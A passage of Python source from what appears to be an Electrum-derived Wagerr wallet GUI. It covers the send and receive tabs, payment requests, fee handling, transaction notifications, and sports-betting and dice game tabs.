"servers that handle the most complicated parts of the Wagerr system.") + "\n\n" +
_("Uses icons from the Icons8 icon pack (icons8.com).")))
def show_update_check(self, version=None):
self.gui_object._update_check = UpdateCheck(self, version)
def show_report_bug(self):
msg = ' '.join([
_("Please report any bugs as issues on github:<br/>"),
f'''<a href="{constants.GIT_REPO_ISSUES_URL}">{constants.GIT_REPO_ISSUES_URL}</a><br/><br/>''',
_("Before reporting a bug, upgrade to the most recent version of Electrum (latest release or git HEAD), and include the version number in your report."),
_("Try to explain not only what the bug is, but how it occurs.")
])
self.show_message(msg, title="Electrum - " + _("Reporting Bugs"), rich_text=True)
def notify_transactions(self):
if self.tx_notification_queue.qsize() == 0:
return
if not self.wallet.up_to_date:
return # no notifications while syncing
now = time.time()
rate_limit = 20 # seconds
if self.tx_notification_last_time + rate_limit > now:
return
self.tx_notification_last_time = now
self.logger.info("Notifying GUI about new transactions")
txns = []
while True:
try:
txns.append(self.tx_notification_queue.get_nowait())
except queue.Empty:
break
# Combine the transactions if there are at least three
if len(txns) >= 3:
total_amount = 0
for tx in txns:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if not is_relevant:
continue
total_amount += v
self.notify(_("{} new transactions: Total amount received in the new transactions {}")
.format(len(txns), self.format_amount_and_units(total_amount)))
else:
for tx in txns:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if not is_relevant:
continue
self.notify(_("New transaction: {}").format(self.format_amount_and_units(v)))
def notify(self, message):
if self.tray:
try:
# this requires Qt 5.9
self.tray.showMessage("Electrum", message, read_QIcon("electrum_dark_icon"), 20000)
except TypeError:
self.tray.showMessage("Electrum", message, QSystemTrayIcon.Information, 20000)
# custom wrappers for getOpenFileName and getSaveFileName, that remember the path selected by the user
def getOpenFileName(self, title, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
fileName, __ = QFileDialog.getOpenFileName(self, title, directory, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def getSaveFileName(self, title, filename, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
path = os.path.join( directory, filename )
fileName, __ = QFileDialog.getSaveFileName(self, title, path, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def timer_actions(self):
# Note this runs in the GUI thread
if self.need_update.is_set():
self.need_update.clear()
self.update_wallet()
elif not self.wallet.up_to_date:
# this updates "synchronizing" progress
self.update_status()
# resolve aliases
# FIXME this is a blocking network call that has a timeout of 5 sec
self.payto_e.resolve()
# update fee
if self.require_fee_update:
self.do_update_fee()
self.require_fee_update = False
self.notify_transactions()
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, self.num_zeros, self.decimal_point, is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, amount):
text = self.format_amount(amount) + ' '+ self.base_unit()
x = self.fx.format_amount_and_units(amount) if self.fx else None
if text and x:
text += ' (%s)'%x
return text
def format_fee_rate(self, fee_rate):
# fee_rate is in sat/kB
return format_fee_satoshis(fee_rate/1000, num_zeros=self.num_zeros) + ' sat/byte'
def get_decimal_point(self):
return self.decimal_point
def base_unit(self):
return decimal_point_to_base_unit_name(self.decimal_point)
def connect_fields(self, window, btc_e, fiat_e, fee_e):
def edit_changed(edit):
if edit.follows:
return
edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
fiat_e.is_last_edited = (edit == fiat_e)
amount = edit.get_amount()
rate = self.fx.exchange_rate() if self.fx else Decimal('NaN')
if rate.is_nan() or amount is None:
if edit is fiat_e:
btc_e.setText("")
if fee_e:
fee_e.setText("")
else:
fiat_e.setText("")
else:
if edit is fiat_e:
btc_e.follows = True
btc_e.setAmount(int(amount / Decimal(rate) * COIN))
btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
btc_e.follows = False
if fee_e:
window.update_fee()
else:
fiat_e.follows = True
fiat_e.setText(self.fx.ccy_amount_str(
amount * Decimal(rate) / COIN, False))
fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
fiat_e.follows = False
btc_e.follows = False
fiat_e.follows = False
fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
btc_e.textChanged.connect(partial(edit_changed, btc_e))
fiat_e.is_last_edited = False
def update_status(self):
if not self.wallet:
return
if self.network is None:
text = _("Offline")
icon = read_QIcon("status_disconnected.png")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
fork_str = "_fork" if len(self.network.get_blockchains())>1 else ""
# Server height can be 0 after switching to a new server
# until we get a headers subscription request response.
# Display the synchronizing message in that case.
if not self.wallet.up_to_date or server_height == 0:
num_sent, num_answered = self.wallet.get_history_sync_state_details()
text = ("{} ({}/{})"
.format(_("Synchronizing..."), num_answered, num_sent))
icon = read_QIcon("status_waiting.png")
elif server_lag > 1:
text = _("Server is lagging ({} blocks)").format(server_lag)
icon = read_QIcon("status_lagging%s.png"%fork_str)
else:
c, u, x = self.wallet.get_balance()
text = _("Balance" ) + ": %s "%(self.format_amount_and_units(c))
if u:
text += " [%s unconfirmed]"%(self.format_amount(u, is_diff=True).strip())
if x:
text += " [%s unmatured]"%(self.format_amount(x, is_diff=True).strip())
# append fiat balance and price
if self.fx.is_enabled():
text += self.fx.get_fiat_status_text(c + u + x,
self.base_unit(), self.get_decimal_point()) or ''
if not self.network.proxy:
icon = read_QIcon("status_connected%s.png"%fork_str)
else:
icon = read_QIcon("status_connected_proxy%s.png"%fork_str)
else:
if self.network.proxy:
text = "{} ({})".format(_("Not connected"), _("proxy enabled"))
else:
text = _("Not connected")
icon = read_QIcon("status_disconnected.png")
self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
self.balance_label.setText(text)
self.blockchain_status.setText("Height: {} ".format(self.network.get_local_height()))
self.status_button.setIcon( icon )
def update_wallet(self):
self.update_status()
if self.wallet.up_to_date or not self.network or not self.network.is_connected():
self.update_tabs()
def update_tabs(self, wallet=None):
if wallet is None:
wallet = self.wallet
if wallet != self.wallet:
return
self.dice_history_model.refresh('update_tabs')
self.betting_history_model.refresh('update_tabs') #put this to refresh first so it can fill bet label for history model
self.history_model.refresh('update_tabs')
self.request_list.update()
self.address_list.update()
self.utxo_list.update()
self.contact_list.update()
self.invoice_list.update()
try:
self.sports_data = self.network.run_from_another_thread(self.network.get_sports_list(timeout=3)) #sport list
#print('Sport List: ', self.sports_data)
except Exception as e:
self.logger.info(f'Error getting event list from network: {repr(e)}')
return
self.sports_list.build_sportlist(self.sports_data)
self.sports_list.update()
self.update_completions()
def create_history_tab(self):
self.history_model = HistoryModel(self)
self.history_list = l = HistoryList(self, self.history_model)
self.history_model.set_view(self.history_list)
l.searchable_list = l
toolbar = l.create_toolbar(self.config)
toolbar_shown = self.config.get('show_toolbar_history', False)
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def create_betting_history_tab(self):
self.betting_history_model = BettingHistoryModel(self)
self.betting_history_list = l = BettingHistoryList(self, self.betting_history_model)
self.betting_history_list.setStyleSheet(
"QTreeView {"
"show-decoration-selected: 1;"
"}"
"QTreeView::item {"
"padding: 5px;"
"}")
self.betting_history_list.setAlternatingRowColors(True)
self.betting_history_model.set_view(self.betting_history_list)
l.searchable_list = l
toolbar = l.create_toolbar(self.config)
toolbar_shown = self.config.get('show_toolbar_history', False)
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def create_dice_history_grid(self):
self.dice_history_model = DiceHistoryModel(self)
self.dice_history_list = l = DiceHistoryList(self, self.dice_history_model)
self.dice_history_list.setStyleSheet(
"QTreeView {"
"show-decoration-selected: 1;"
"}"
"QTreeView::item {"
"padding: 5px;"
"}")
self.dice_history_list.setAlternatingRowColors(True)
self.dice_history_model.set_view(self.dice_history_list)
l.searchable_list = l
toolbar = l.create_toolbar(self.config)
toolbar_shown = self.config.get('show_toolbar_history', False)
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def show_address(self, addr):
from . import address_dialog
d = address_dialog.AddressDialog(self, addr)
d.exec_()
def show_transaction(self, tx, tx_desc = None):
'''tx_desc is set only for txs created in the Send tab'''
show_transaction(tx, self, tx_desc)
def create_receive_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.receive_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
self.receive_address_e = ButtonsLineEdit()
self.receive_address_e.addCopyButton(self.app)
self.receive_address_e.setReadOnly(True)
msg = _('Wagerr address where the payment should be received. Note that each payment request uses a different Wagerr address.')
self.receive_address_label = HelpLabel(_('Receiving address'), msg)
self.receive_address_e.textChanged.connect(self.update_receive_qr)
self.receive_address_e.textChanged.connect(self.update_receive_address_styling)
self.receive_address_e.setFocusPolicy(Qt.ClickFocus)
grid.addWidget(self.receive_address_label, 0, 0)
grid.addWidget(self.receive_address_e, 0, 1, 1, -1)
self.receive_message_e = QLineEdit()
grid.addWidget(QLabel(_('Description')), 1, 0)
grid.addWidget(self.receive_message_e, 1, 1, 1, -1)
self.receive_message_e.textChanged.connect(self.update_receive_qr)
self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
self.receive_amount_e.setFixedWidth(18 * char_width_in_lineedit())
grid.addWidget(QLabel(_('Requested amount')), 2, 0)
grid.addWidget(self.receive_amount_e, 2, 1)
self.receive_amount_e.textChanged.connect(self.update_receive_qr)
self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_receive_e.setVisible(False)
grid.addWidget(self.fiat_receive_e, 2, 2, Qt.AlignLeft)
self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)
self.expires_combo = QComboBox()
self.expires_combo.addItems([i[0] for i in expiration_values])
self.expires_combo.setCurrentIndex(3)
self.expires_combo.setFixedWidth(self.receive_amount_e.width())
msg = ' '.join([
_('Expiration date of your request.'),
_('This information is seen by the recipient if you send them a signed payment request.'),
_('Expired requests have to be deleted manually from your list, in order to free the corresponding Bitcoin addresses.'),
_('The bitcoin address never expires and will always be part of this electrum wallet.'),
])
grid.addWidget(HelpLabel(_('Request expires'), msg), 3, 0)
grid.addWidget(self.expires_combo, 3, 1)
self.expires_label = QLineEdit('')
self.expires_label.setReadOnly(1)
self.expires_label.setFocusPolicy(Qt.NoFocus)
self.expires_label.hide()
grid.addWidget(self.expires_label, 3, 1)
self.save_request_button = QPushButton(_('Save'))
self.save_request_button.clicked.connect(self.save_payment_request)
self.new_request_button = QPushButton(_('New'))
self.new_request_button.clicked.connect(self.new_payment_request)
self.receive_qr = QRCodeWidget(fixedSize=200)
self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window()
self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor))
self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))
self.receive_buttons = buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.save_request_button)
buttons.addWidget(self.new_request_button)
grid.addLayout(buttons, 4, 1, 1, 2)
self.receive_requests_label = QLabel(_('Requests'))
from .request_list import RequestList
self.request_list = RequestList(self)
# layout
vbox_g = QVBoxLayout()
vbox_g.addLayout(grid)
vbox_g.addStretch()
hbox = QHBoxLayout()
hbox.addLayout(vbox_g)
hbox.addWidget(self.receive_qr)
w = QWidget()
w.searchable_list = self.request_list
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.receive_requests_label)
vbox.addWidget(self.request_list)
vbox.setStretchFactor(self.request_list, 1000)
return w
def delete_payment_request(self, addr):
self.wallet.remove_payment_request(addr, self.config)
self.request_list.update()
self.clear_receive_tab()
def get_request_URI(self, addr):
req = self.wallet.receive_requests[addr]
message = self.wallet.labels.get(addr, '')
amount = req['amount']
extra_query_params = {}
if req.get('time'):
extra_query_params['time'] = str(int(req.get('time')))
if req.get('exp'):
extra_query_params['exp'] = str(int(req.get('exp')))
if req.get('name') and req.get('sig'):
sig = bfh(req.get('sig'))
sig = bitcoin.base_encode(sig, base=58)
extra_query_params['name'] = req['name']
extra_query_params['sig'] = sig
uri = util.create_bip21_uri(addr, amount, message, extra_query_params=extra_query_params)
return str(uri)
def sign_payment_request(self, addr):
alias = self.config.get('alias')
alias_privkey = None
if alias and self.alias_info:
alias_addr, alias_name, validated = self.alias_info
if alias_addr:
if self.wallet.is_mine(alias_addr):
msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
self.password = None
if self.wallet.has_keystore_encryption():
if self.password == None:
self.password = self.password_dialog(msg)
if not self.password:
return
try:
self.wallet.sign_payment_request(addr, alias, alias_addr, self.password)
except Exception as e:
self.show_error(str(e))
return
else:
return
def save_payment_request(self):
addr = str(self.receive_address_e.text())
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
if not message and not amount:
self.show_error(_('No message or amount'))
return False
i = self.expires_combo.currentIndex()
expiration = list(map(lambda x: x[1], expiration_values))[i]
req = self.wallet.make_payment_request(addr, amount, message, expiration)
try:
self.wallet.add_payment_request(req, self.config)
except Exception as e:
self.logger.exception('Error adding payment request')
self.show_error(_('Error adding payment request') + ':\n' + str(e))
else:
self.sign_payment_request(addr)
self.save_request_button.setEnabled(False)
finally:
self.request_list.update()
self.address_list.update()
def view_and_paste(self, title, msg, data):
dialog = WindowModalDialog(self, title)
vbox = QVBoxLayout()
label = QLabel(msg)
label.setWordWrap(True)
vbox.addWidget(label)
pr_e = ShowQRTextEdit(text=data)
vbox.addWidget(pr_e)
vbox.addLayout(Buttons(CopyCloseButton(pr_e.text, self.app, dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def export_payment_request(self, addr):
r = self.wallet.receive_requests.get(addr)
pr = paymentrequest.serialize_request(r).SerializeToString()
name = r['id'] + '.bip70'
fileName = self.getSaveFileName(_("Select where to save your payment request"), name, "*.bip70")
if fileName:
with open(fileName, "wb+") as f:
f.write(util.to_bytes(pr))
self.show_message(_("Request saved successfully"))
self.saved = True
def new_payment_request(self):
addr = self.wallet.get_unused_address()
if addr is None:
if not self.wallet.is_deterministic():
msg = [
_('No more addresses in your wallet.'),
_('You are using a non-deterministic wallet, which cannot create new addresses.'),
_('If you want to create new addresses, use a deterministic wallet instead.')
]
self.show_message(' '.join(msg))
return
if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
return
addr = self.wallet.create_new_address(False)
self.set_receive_address(addr)
self.expires_label.hide()
self.expires_combo.show()
self.new_request_button.setEnabled(False)
self.receive_message_e.setFocus(1)
def set_receive_address(self, addr):
self.receive_address_e.setText(addr)
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
def clear_receive_tab(self):
try:
addr = self.wallet.get_receiving_address() or ''
except InternalAddressCorruption as e:
self.show_error(str(e))
addr = ''
self.receive_address_e.setText(addr)
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
self.expires_label.hide()
self.expires_combo.show()
def toggle_qr_window(self):
from . import qrwindow
if not self.qr_window:
self.qr_window = qrwindow.QR_Window(self)
self.qr_window.setVisible(True)
self.qr_window_geometry = self.qr_window.geometry()
else:
if not self.qr_window.isVisible():
self.qr_window.setVisible(True)
self.qr_window.setGeometry(self.qr_window_geometry)
else:
self.qr_window_geometry = self.qr_window.geometry()
self.qr_window.setVisible(False)
self.update_receive_qr()
def show_send_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab))
def show_receive_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab))
def receive_at(self, addr):
if not bitcoin.is_address(addr):
return
self.show_receive_tab()
self.receive_address_e.setText(addr)
self.new_request_button.setEnabled(True)
def update_receive_qr(self):
addr = str(self.receive_address_e.text())
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
self.save_request_button.setEnabled((amount is not None) or (message != ""))
uri = util.create_bip21_uri(addr, amount, message)
self.receive_qr.setData(uri)
if self.qr_window and self.qr_window.isVisible():
self.qr_window.qrw.setData(uri)
def update_receive_address_styling(self):
addr = str(self.receive_address_e.text())
if self.wallet.is_used(addr):
self.receive_address_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
self.receive_address_e.setToolTip(_("This address has already been used. "
"For better privacy, do not reuse it for new payments."))
else:
self.receive_address_e.setStyleSheet("")
self.receive_address_e.setToolTip("")
def set_feerounding_text(self, num_satoshis_added):
self.feerounding_text = (_('Additional {} satoshis are going to be added.')
.format(num_satoshis_added))
def create_send_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.send_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
from .paytoedit import PayToEdit
self.amount_e = BTCAmountEdit(self.get_decimal_point)
self.amount_e.setFixedWidth(18 * char_width_in_lineedit())
self.payto_e = PayToEdit(self)
msg = _('Recipient of the funds.') + '\n\n'\
+ _('You may enter a Wagerr address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Wagerr address)')
payto_label = HelpLabel(_('Pay to'), msg)
grid.addWidget(payto_label, 1, 0)
grid.addWidget(self.payto_e, 1, 1, 1, -1)
completer = QCompleter()
completer.setCaseSensitivity(False)
self.payto_e.set_completer(completer)
completer.setModel(self.completions)
msg = _('Description of the transaction (not mandatory).') + '\n\n'\
+ _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
description_label = HelpLabel(_('Description'), msg)
grid.addWidget(description_label, 2, 0)
self.message_e = MyLineEdit()
self.message_e.setMinimumWidth(700)
grid.addWidget(self.message_e, 2, 1, 1, -1)
self.from_label = QLabel(_('From'))
grid.addWidget(self.from_label, 3, 0)
self.from_list = FromList(self, self.from_list_menu)
grid.addWidget(self.from_list, 3, 1, 1, -1)
self.set_pay_from([])
msg = _('Amount to be sent.') + '\n\n' \
+ _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
+ _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
+ _('Keyboard shortcut: type "!" to send all your coins.')
amount_label = HelpLabel(_('Amount'), msg)
grid.addWidget(amount_label, 4, 0)
grid.addWidget(self.amount_e, 4, 1)
self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_send_e.setVisible(False)
grid.addWidget(self.fiat_send_e, 4, 2)
self.amount_e.frozen.connect(
lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))
self.max_button = EnterButton(_("Max"), self.spend_max)
self.max_button.setFixedWidth(self.amount_e.width())
self.max_button.setCheckable(True)
grid.addWidget(self.max_button, 4, 3)
hbox = QHBoxLayout()
hbox.addStretch(1)
grid.addLayout(hbox, 4, 4)
msg = _('Wagerr transactions are in general not free. A transaction fee is paid by the sender of the funds.') + '\n\n'\
+ _('The amount of fee can be decided freely by the sender. However, transactions with low fees take more time to be processed.') + '\n\n'\
+ _('A suggested fee is automatically added to this field. You may override it. The suggested fee increases with the size of the transaction.')
self.fee_e_label = HelpLabel(_('Fee'), msg)
def fee_cb(dyn, pos, fee_rate):
if dyn:
if self.config.use_mempool_fees():
self.config.set_key('depth_level', pos, False)
else:
self.config.set_key('fee_level', pos, False)
else:
self.config.set_key('fee_per_kb', fee_rate, False)
if fee_rate:
fee_rate = Decimal(fee_rate)
self.feerate_e.setAmount(quantize_feerate(fee_rate / 1000))
else:
self.feerate_e.setAmount(None)
self.fee_e.setModified(False)
self.fee_slider.activate()
self.spend_max() if self.max_button.isChecked() else self.update_fee()
self.fee_slider = FeeSlider(self, self.config, fee_cb)
self.fee_slider.setFixedWidth(self.amount_e.width())
def on_fee_or_feerate(edit_changed, editing_finished):
edit_other = self.feerate_e if edit_changed == self.fee_e else self.fee_e
if editing_finished:
if edit_changed.get_amount() is None:
# This is so that when the user blanks the fee and moves on,
# we go back to auto-calculate mode and put a fee back.
edit_changed.setModified(False)
else:
# edit_changed was edited just now, so make sure we will
# freeze the correct fee setting (this)
edit_other.setModified(False)
self.fee_slider.deactivate()
self.update_fee()
class TxSizeLabel(QLabel):
def setAmount(self, byte_size):
self.setText(('x %s bytes =' % byte_size) if byte_size else '')
self.size_e = TxSizeLabel()
self.size_e.setAlignment(Qt.AlignCenter)
self.size_e.setAmount(0)
self.size_e.setFixedWidth(self.amount_e.width())
self.size_e.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
self.feerate_e = FeerateEdit(lambda: 0)
self.feerate_e.setAmount(self.config.fee_per_byte())
self.feerate_e.textEdited.connect(partial(on_fee_or_feerate, self.feerate_e, False))
self.feerate_e.editingFinished.connect(partial(on_fee_or_feerate, self.feerate_e, True))
self.fee_e = BTCAmountEdit(self.get_decimal_point)
self.fee_e.textEdited.connect(partial(on_fee_or_feerate, self.fee_e, False))
self.fee_e.editingFinished.connect(partial(on_fee_or_feerate, self.fee_e, True))
def feerounding_onclick():
text = (self.feerounding_text + '\n\n' +
_('To somewhat protect your privacy, Electrum tries to create change with similar precision to other outputs.') + ' ' +
_('At most 100 satoshis might be lost due to this rounding.') + ' ' +
_("You can disable this setting in '{}'.").format(_('Preferences')) + '\n' +
_('Also, dust is not kept as change, but added to the fee.') + '\n' +
_('Also, when batching RBF transactions, BIP 125 imposes a lower bound on the fee.'))
self.show_message(title=_('Fee rounding'), msg=text)
self.feerounding_icon = QPushButton(read_QIcon('info.png'), '')
self.feerounding_icon.setFixedWidth(round(2.2 * char_width_in_lineedit()))
self.feerounding_icon.setFlat(True)
self.feerounding_icon.clicked.connect(feerounding_onclick)
self.feerounding_icon.setVisible(False)
self.connect_fields(self, self.amount_e, self.fiat_send_e, self.fee_e)
vbox_feelabel = QVBoxLayout()
vbox_feelabel.addWidget(self.fee_e_label)
vbox_feelabel.addStretch(1)
grid.addLayout(vbox_feelabel, 5, 0)
self.fee_adv_controls = QWidget()
hbox = QHBoxLayout(self.fee_adv_controls)
hbox.setContentsMargins(0, 0, 0, 0)
hbox.addWidget(self.feerate_e)
hbox.addWidget(self.size_e)
hbox.addWidget(self.fee_e)
hbox.addWidget(self.feerounding_icon, Qt.AlignLeft)
hbox.addStretch(1)
vbox_feecontrol = QVBoxLayout()
vbox_feecontrol.addWidget(self.fee_adv_controls)
vbox_feecontrol.addWidget(self.fee_slider)
grid.addLayout(vbox_feecontrol, 5, 1, 1, -1)
if not self.config.get('show_fee', False):
self.fee_adv_controls.setVisible(False)
self.preview_button = EnterButton(_("Preview"), self.do_preview)
self.preview_button.setToolTip(_('Display the details of your transaction before signing it.'))
self.send_button = EnterButton(_("Send"), self.do_send)
self.clear_button = EnterButton(_("Clear"), self.do_clear)
buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_button)
buttons.addWidget(self.preview_button)
buttons.addWidget(self.send_button)
grid.addLayout(buttons, 6, 1, 1, 3)
self.amount_e.shortcut.connect(self.spend_max)
self.payto_e.textChanged.connect(self.update_fee)
self.amount_e.textEdited.connect(self.update_fee)
def reset_max(text):
self.max_button.setChecked(False)
enable = not bool(text) and not self.amount_e.isReadOnly()
self.max_button.setEnabled(enable)
self.amount_e.textEdited.connect(reset_max)
self.fiat_send_e.textEdited.connect(reset_max)
def entry_changed():
text = ""
amt_color = ColorScheme.DEFAULT
fee_color = ColorScheme.DEFAULT
feerate_color = ColorScheme.DEFAULT
if self.not_enough_funds:
amt_color, fee_color = ColorScheme.RED, ColorScheme.RED
feerate_color = ColorScheme.RED
text = _("Not enough funds")
c, u, x = self.wallet.get_frozen_balance()
if c+u+x:
text += " ({} {} {})".format(
self.format_amount(c + u + x).strip(), self.base_unit(), _("are frozen")
)
# blue color denotes auto-filled values
elif self.fee_e.isModified():
feerate_color = ColorScheme.BLUE
elif self.feerate_e.isModified():
fee_color = ColorScheme.BLUE
elif self.amount_e.isModified():
fee_color = ColorScheme.BLUE
feerate_color = ColorScheme.BLUE
else:
amt_color = ColorScheme.BLUE
fee_color = ColorScheme.BLUE
feerate_color = ColorScheme.BLUE
self.statusBar().showMessage(text)
self.amount_e.setStyleSheet(amt_color.as_stylesheet())
self.fee_e.setStyleSheet(fee_color.as_stylesheet())
self.feerate_e.setStyleSheet(feerate_color.as_stylesheet())
self.amount_e.textChanged.connect(entry_changed)
self.fee_e.textChanged.connect(entry_changed)
self.feerate_e.textChanged.connect(entry_changed)
self.invoices_label = QLabel(_('Invoices'))
from .invoice_list import InvoiceList
self.invoice_list = InvoiceList(self)
vbox0 = QVBoxLayout()
vbox0.addLayout(grid)
hbox = QHBoxLayout()
hbox.addLayout(vbox0)
w = QWidget()
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.invoices_label)
vbox.addWidget(self.invoice_list)
vbox.setStretchFactor(self.invoice_list, 1000)
w.searchable_list = self.invoice_list
run_hook('create_send_tab', grid)
return w
def create_chaingames_tab(self):
self.grid_chaingames = grid = QGridLayout()
self.grid_chaingames.setColumnStretch(0,1.3)
self.grid_chaingames.setColumnMinimumWidth(0,100)
self.grid_chaingames.setColumnStretch(1,8.7)
self.quickgame_list = QuickGameListView(self)
self.quickgame_list.selectionModel().selectionChanged.connect(self.chaingame_changed)
self.chaingame_widgets = {
"Dice": DiceGameWidget(self),
}
self.grid_chaingames.addWidget(self.quickgame_list, 0,0)
self.grid_chaingames.addWidget(self.chaingame_widgets["Dice"], 0,1)
self.w = QWidget()
self.w.setLayout(self.grid_chaingames)
run_hook('create_chaingames_tab',grid)
return self.w
#for upcoming games.
def chaingame_changed(self,newIdx,oldIdx = None):
idx = newIdx.indexes()[0]
sport = self.quickgame_list.model().itemFromIndex(idx)
self.selectedGame = re.sub(r'\([^)]*\)', '', sport.text()).strip()
print("Selected Game : ", self.selectedGame)
self.quickgame_list.selectionModel().setCurrentIndex(idx, QItemSelectionModel.SelectCurrent)
#self.grid_chaingames.addWidget(self.chaingame_widgets["Dice"],0,1)
pyqtSlot(str)
def search_team(self):
self.search_filter = self.team_search_box.text()
self.sports_list.update()
def create_betting_tab(self):
self.grid_betting = grid =QGridLayout()
self.grid_betting.setColumnStretch(0,1.3)
self.grid_betting.setColumnStretch(1,6.7)
self.grid_betting.setColumnStretch(2,2)
self.grid_betting.setColumnMinimumWidth(0,100)
self.eventQListWidget = QListWidget()
self.eventQListWidget.setMinimumWidth(800)
self.eventQListWidget.setStyleSheet("QListWidget { border:0px; background-color:#DEE2E6; } QListWidget::item { background-color:#fff}")
self.eventQListWidget.setSpacing(10)
self.eventQListWidget.verticalScrollBar().setSingleStep(20)
self.sports_list = SportListView(self)
self.vbox_grid = QVBoxLayout()
self.list_header_backg = QWidget()
self.list_header_backg.setContentsMargins(0,0,0,0)
self.list_header_backg.setStyleSheet(
"QWidget{"
"background-color:#BD0000;"
"margin:0 5px;"
"}"
)
self.hbox_list_header = QHBoxLayout(self.list_header_backg)
self.hbox_list_header.addStretch(0)
self.typing_timer = QTimer()
self.typing_timer.setSingleShot(True)
self.typing_timer.timeout.connect(self.search_team)
self.team_search_box = ButtonsLineEdit()
self.search_filter = '' #global variable for event list search filter
self.team_search_box.setStyleSheet("background-color:white;")
self.team_search_box.addButton("clear.png", self.team_search_box.clear, _("Clear Search"))
self.team_search_box.setMinimumSize(350,35)
self.team_search_box.setPlaceholderText("Search by team, sport or event id.")
self.team_search_box.textChanged.connect(lambda: self.typing_timer.start(500))
self.hbox_list_header.insertWidget(0,self.team_search_box)
self.odds_type_label = QLabel("Current Odds Type: " + (str("Effective") if self.config.get('iseffectiveodds',True) else str("Onchain")))
self.odds_type_label.setStyleSheet("font-weight:bold;color:white")
self.hbox_list_header.insertWidget(2,self.odds_type_label)
self.vbox_grid.addWidget(self.list_header_backg)
self.vbox_grid.addWidget(self.eventQListWidget)
self.betting_main_widget = BettingMainWidget(self)
self.w = QWidget()
self.grid_betting.addWidget(self.sports_list,0,0)
self.grid_betting.addLayout(self.vbox_grid,0,1)
self.grid_betting.addWidget(self.betting_main_widget,0,2)
#self.grid_betting.setColumnMinimumWidth(1,1120)
self.w.setLayout(self.grid_betting)
#self.w.setMinimumSize(800, 800)
run_hook('create_betting_tab', grid)
return self.w
def spend_max(self):
if run_hook('abort_send', self):
return
self.max_button.setChecked(True)
self.do_update_fee()
def update_fee(self):
self.require_fee_update = True
def get_payto_or_dummy(self):
r = self.payto_e.get_recipient()
if r:
return r
return (TYPE_ADDRESS, self.wallet.dummy_address())
def do_update_fee(self):
'''Recalculate the fee. If the fee was manually input, retain it, but
still build the TX to see if there are enough funds.
'''
freeze_fee = self.is_send_fee_frozen()
freeze_feerate = self.is_send_feerate_frozen()
amount = '!' if self.max_button.isChecked() else self.amount_e.get_amount()
if amount is None:
if not freeze_fee:
self.fee_e.setAmount(None)
self.not_enough_funds = False
self.statusBar().showMessage('')
return
outputs, fee_estimator, tx_desc, coins = self.read_send_tab()
if not outputs:
_type, addr = self.get_payto_or_dummy()
outputs = [TxOutput(_type, addr, amount)]
is_sweep = bool(self.tx_external_keypairs)
make_tx = lambda fee_est: \
self.wallet.make_unsigned_transaction(
coins, outputs, self.config,
fixed_fee=fee_est, is_sweep=is_sweep)
try:
tx = make_tx(fee_estimator)
self.not_enough_funds = False
except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
if not freeze_fee:
self.fee_e.setAmount(None)
if not freeze_feerate:
self.feerate_e.setAmount(None)
self.feerounding_icon.setVisible(False)
if isinstance(e, NotEnoughFunds):
